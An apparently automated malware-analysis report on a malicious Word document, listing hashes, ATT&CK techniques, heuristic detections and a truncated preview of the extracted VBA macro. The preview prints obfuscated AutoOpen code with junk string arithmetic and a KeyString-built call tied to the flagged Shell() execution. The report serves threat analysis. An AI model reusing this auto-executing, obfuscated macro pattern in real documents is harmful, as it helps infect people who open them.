Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2374dbfc77a0b148…

MALICIOUS

Office (OLE)

124.4 KB Created: 2018-09-28 19:50:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 0a8c1f35ebf0f55a44628e91cd7e9fbb SHA-1: d3329276fea11a5dc60e3bd14c810bdbe19833d8 SHA-256: 2374dbfc77a0b14843a75e4f8358aa6b0c6b96482fd4231639194ee310cea943
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating an attempt to execute external commands or download additional payloads. The presence of a 'Password-protected archive handoff' heuristic suggests the document may be part of a multi-stage attack designed to bypass security gateways.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6700702-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6700702-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70122 bytes
SHA-256: e2af85491cc21c9c1ba42b0b96029f8f96b24e08d972f88b328eaf752d081a70
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ikXVjZibrS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim VVVbzf(2)
VVVbzf(0) = InStrRev(ZRIHi + ZmoHcTJtVwuNUPZtma + ZsHEoT, uwkkoSI + LFbGzlonMsioWSOOUOVw + EvcjznH) + InStrRev(bVTOaH + BHqDFcGWDuNIqWvqzFq + rSuiLDo, zTpTfwSw + jMdOlMCfRjKLiEMzuSPnYI + zqwXDc) + InStrRev(ZNEJWJMI + pIHPTkwiITFPtEB + chvtfwiY, GGwPTNM + knEuHVHwudEwjHNNj + MWwCMaq) + InStrRev(hWizG + oXirkdwhhCiLAwwChwFJaRL + hjaqIUYq, siYOGfY + BjYbrfqjOEZZkCzLaqbH + OsJjwd)
VVVbzf(1) = InStrRev(jrMJF + RfobATzVPshlZbf + njGlkBQ, pqIYBJKn + VvunUFFqwSldCFXDrzmdE + jAKXbl) + InStr(hhstmff + raEMGSiYjotiRqHEfEWjq + XirnYL, mibLdhjz + GtwPCqIajjUtkvzjwL + jfLjk)
   Dim EzwCjY(2)
EzwCjY(0) = InStrRev(BTLQV + UtuXXoSrZTOijFctcXAZo + UZojaun, VGjFsQ + cMKHWYFobKUGKqcO + zYbmT) + InStrRev(WXBLqtwb + zXQblTNvBAZOQvdojV + jjRazs, fISirM + FwYXboIlImwSnTzhrUsdVV + QwlLrL)
EzwCjY(1) = InStrRev(kzfwumI + GcFrpPktrtMVCCwMAzvmDE + PwnFL, PsXdbjB + TWVPuzaGwptLmGKUv + hIinJbq) + InStrRev(wfiShiS + zMzOOtDUqUWjhoNhHS + BRqNcWV, zivfmSuo + GzkISOlsVlbbzzYf + zmjWwao) + InStrRev(SsXMRl + XENlcCwNTEpVIaGND + iarXCt, KqjoB + uXDiakkFAzjKXNXCWn + fIQFJ) + InStrRev(hUhuf + ZKkbpXFKRVASzEaASX + izWwT, UGbOo + vzIhawkJvqQUdUmCAGdT + cIzPY)
   Dim wEfij(1)
wEfij(0) = InStr(HcFzPk + RkNpsmSurdoOkFPEii + iYNnXa, szUObSvA + mlnGJHlAsAjZVjQiwKr + kquVPnJO) + InStr(sDbYPF + aGuLYkljiWlGrVSNBWNj + IrZuK, iYRpAZ + jKDirKwNkDwsNWIzQt + YczDi) + InStrRev(qwAES + EuiwsKHEjTSsaCP + iBuibVNt, nwDDSNUR + ARYQjZhwVzpiCAzWX + AHtXFz) + InStrRev(FkOVwNd + BvfvlwwAZQNVvdCkXMUZhT + bZPQYW, bSVPIu + ajQkokNzNFihbUlXabIr + aBjPBH)
   Dim UVRit(2)
UVRit(0) = InStrRev(qzimkH + zhowilSWMLpiTsiUYT + PaGwIu, itQfYPin + DvRhYuWXuCnRsZYbsc + UjvNo) + InStrRev(KuupQHGh + ZnWTqcYjPqJMhmzBdjiS + HsbbpCr, SpCqio + FnzAiNilIfYjrUizBzuNw + ORcwTMKr)
UVRit(1) = InStrRev(hjZitpU + ziaUNvpRrLMlzQJ + TOoPpHzJ, HZTmq + zOpXXtzRjXofdEsjtLfGG + JklGOV) + InStrRev(SviRv + zkacVpdbOuHVbRIDjPjwSB + KkNnwO, ufiRij + sUOBjnzjslmIbDVT + bzsPOX)
   Dim ztVaa(1)
ztVaa(0) = InStrRev(nTSHUB + jpiquLshwWqRazLoQXfMj + aFujFNT, aLTsDF + dDJGMWGnMDEEdzLJvArJWVI + AhlLT) + InStrRev(fViOins + PrOwMiTSInmlEAGnNb + NuTqiWD, hHGiu + swSsKDzltKihFzaACsRE + BjEmjH) + InStrRev(SuOIAa + iIlLVaBjjYtYvbuJXswCmA + KiRWfq, JSlta + FziQBWUnWRmEzLLLr + MsCSkS) + InStrRev(jitYsED + rrOizEAaDSZnTqlqO + BsDnitj, wcETA + MiwSKOJBTGECVZFpWa + KUjCWzd)
   Dim TYDGY(1)
TYDGY(0) = InStrRev(nQkJzNGE + wIXCOJMqRWVlVvNThS + KomkJtD, PjROFBFP + iobRfPfmtlvNCcbYDYnw + BDPFt) + InStr(riLsj + ViGlaTWPmsqnPurwM + QjYlh, rkcsTDY + WWlioNGdMDOQJdJNZMo + oXCQuJ)
   Dim jEYLQQ(2)
jEYLQQ(0) = InStrRev(itmOnbo + GfNKRLznzaMnMXYzuCEIi + jaQXtuUn, hcPtZLcT + vhOpUDrjBWjHdiPEfrzVY + JDVqcpdc) + InStrRev(LaDqDiGo + UlPzcNPVvLpwdtnZhGflfNI + cJsjzu, oWOOaH + nWcawQRQuqpzkmBsYDi + HVwub)
jEYLQQ(1) = InStrRev(wkprq + RMscRCDYEjuNZPJiYSaRXo + sEJsvnOj, aNqAbzu + zhjPziMTrvUnLbOLoH + ioRvnYrc) + InStrRev(HGFIp + ijvslnzboAVazrBaf + icOXIf, DlBAG + zzdiwjrsoqOHPhY + TdNDHsSl)
BFaHamFr (KeyString(hIcsk + LuobGC + 17 + 5 + 45 + AbKclM + iSdwpB) + rMMnVrm + foLprjBT + KeyString(nOcrqVqw + whKZE + 19 + 6 + 52 + pUDIofmG + dmjciFEh) + ZjkwB + doLCODdi + jwjOQSEuWKo + vWwjBvn + PzuuDzA + wlViR)
   Dim uvWTcw(2)
uvWTcw(0) = InStrRev(UjZWEtw + HbiOUSjjwwimJuY + OFSWJZUX, SAILbpQ + sEmtziCFnMJVIBIMEujuC + wZvCwtL) + InStrRev(mbMSrGLP + bwsWPZEifIJjvdRCrTwY + UpqUwiUL, hGCjdP + RocsQzLtNszdXhkqjjzoww + ZalZbdRH)
uvWTcw(1) = InStrRev(cYsIUo + nsJYilYFBUzitrCIoQUMQ + TLwaL, fKjdAwz + YQmVrhjWSjSBtNcShai + RwiKj) + InStr(IHNvw + KkdPEscPrzknUhwaaEtzWCl + LoXkPX, DLazkCU + vzlbICVDlQkHjEEqTP + BzvRSd)
   Dim rlSmPv(2)
rlSmPv(0) = InStrRev(rGBEwBF + tKsOrNafIfdkKOQAsJz + ZzCPVQHo, tWhdAX + ImBIGsiikFrkuptKLJqBq + QmpkQc) + InStrRev(rpvQq + niWjdlnloGNjzRwrfGs + cqhCtA, FpWHf + dRwEvKPFZDlRwukCHnD + kQCHraJF) + InStrRev(ONIoC
... (truncated)